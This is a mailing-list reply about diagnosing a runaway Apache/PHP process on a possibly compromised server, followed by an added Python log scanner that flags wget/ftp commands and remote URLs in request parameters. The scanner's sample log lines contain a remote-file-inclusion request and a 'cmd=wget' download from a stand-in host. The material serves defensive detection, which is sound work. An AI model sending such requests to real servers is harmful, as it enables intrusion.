
Re: apache / exe process taking 99 % cpu

On Wed, Sep 01, 2004 at 12:25:19AM +0200, Timo Veith wrote:
> It seems to be a php issue. I 
> searched through all php files that "include" or "fopen" something ... 
> whew there are way too many.
> Any ideas ?

  If you have pristine logfiles for apache you might want to look for
 suspicious parameters passed to requests recently.  Perhaps `ftp`
 or `wget` commands were used to upload the DOS / forking program
 upon your box?

  I'm sure a competent attacker would have either nuked the logs or
 used POSTs for any control - but if you have some code running
 on that box which is using fopen, etc, the initial attempt might
 have been recorded.

  Failing that you could look at installing mod_security to record
 all future GET/POST arguments and payloads.  I found it fairly
 simple to backport to stable, and could probably dig out packages
 if that would be useful.

# The Debian Security Audit Project.
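
An added example, not part of the original message: one way to do the log review suggested above is to decode each request's query string and flag parameters that carry a `wget`/`ftp` command or a remote URL. The indicator patterns, function names and sample log lines are assumptions constructed for illustration; the remote-URL check goes slightly beyond the message, since a URL is what a PHP `include`/`fopen` on user input would fetch.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

# Assumed starting set of indicators, to be tuned per site.
INDICATORS = {
    # the tools named in the message, followed by an argument
    "download-command": re.compile(r'\b(?:wget|ftp)\s+\S', re.I),
    # a parameter that is itself a URL: what a PHP include()/fopen() would fetch
    "remote-url": re.compile(r'^(?:https?|ftp)://', re.I),
}

def scan_line(line):
    """Return a finding for one access-log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode pass for double-encoded values
        for label, rx in INDICATORS.items():
            if rx.search(value):
                hits.append((name, label, value))
    if not hits:
        return None
    return {"host": m.group("host"), "time": m.group("time"),
            "method": m.group("method"), "status": int(m.group("status")),
            "hits": hits}

def scan(lines):
    """Scan an iterable of log lines and return only the findings."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample lines (documentation IP ranges), not taken from the thread.
SAMPLE = [
    '198.51.100.7 - - [31/Aug/2004:21:10:02 +0200] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '203.0.113.9 - - [31/Aug/2004:21:14:40 +0200] "GET /index.php?page=http://192.0.2.10/a.txt HTTP/1.0" 200 312',
    '203.0.113.9 - - [31/Aug/2004:21:15:03 +0200] "GET /view.php?cmd=wget+http%3A%2F%2F192.0.2.10%2Fb HTTP/1.0" 200 12',
    '198.51.100.7 - - [31/Aug/2004:21:16:00 +0200] "POST /forum/post.php HTTP/1.1" 200 844',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["time"], f["host"], f["method"], f["status"], f["hits"])
```

The POST line in the sample produces no finding because its body never reaches the access log, which is the gap that recording request payloads with mod_security would close.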
